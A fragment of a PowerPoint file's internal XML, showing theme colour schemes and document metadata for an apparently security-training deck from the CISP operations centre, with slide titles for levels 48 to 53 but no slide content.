      </a:accent5>
      <a:accent6>
        <a:srgbClr val="3D8DC4"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="19B3B3"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="855ADA"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="sx272TGp_report_light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x272TGp_report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x272TGp_report_light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DF6521"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="D7D03B"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="FFFFFF"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="000000"/>
        </a:accent4>
        <a:accent5>
          <a:srgbClr val="ECB8AB"/>
        </a:accent5>
        <a:accent6>
          <a:srgbClr val="C3BC35"/>
        </a:accent6>
        <a:hlink>
          <a:srgbClr val="188FB4"/>
        </a:hlink>
        <a:folHlink>
          <a:srgbClr val="A98F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x272TGp_report_light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A5A5A5"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="449CD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3D8DC4"/>
        </a:accent6>
        <a:hlink>
          <a:srgbClr val="19B3B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1511</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>70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黑体</vt:lpstr>
      <vt:lpstr>楷体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>sx272TGp_report_light</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>第四十八关</vt:lpstr>
      <vt:lpstr>第四十八关</vt:lpstr>
      <vt:lpstr>第四十九关</vt:lpstr>
      <vt:lpstr>第五十关</vt:lpstr>
      <vt:lpstr>第五十关</vt:lpstr>
      <vt:lpstr>第五十一关</vt:lpstr>
      <vt:lpstr>第五十二关</vt:lpstr>
      <vt:lpstr>第五十二关</vt:lpstr>
      <vt:lpstr>第五十三关</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>中国信息安全测评中心:cisp运营中心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沈传宁</dc:creator>
  <cp:lastModifiedBy>随风</cp:lastModifiedBy>
  <cp:revision>3125</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-02-11T06:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-09-03T08:40:15Z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5EC77F3D4641451695A3550036DF892C</vt:lpwstr>
  </property>
</Properties>
</file>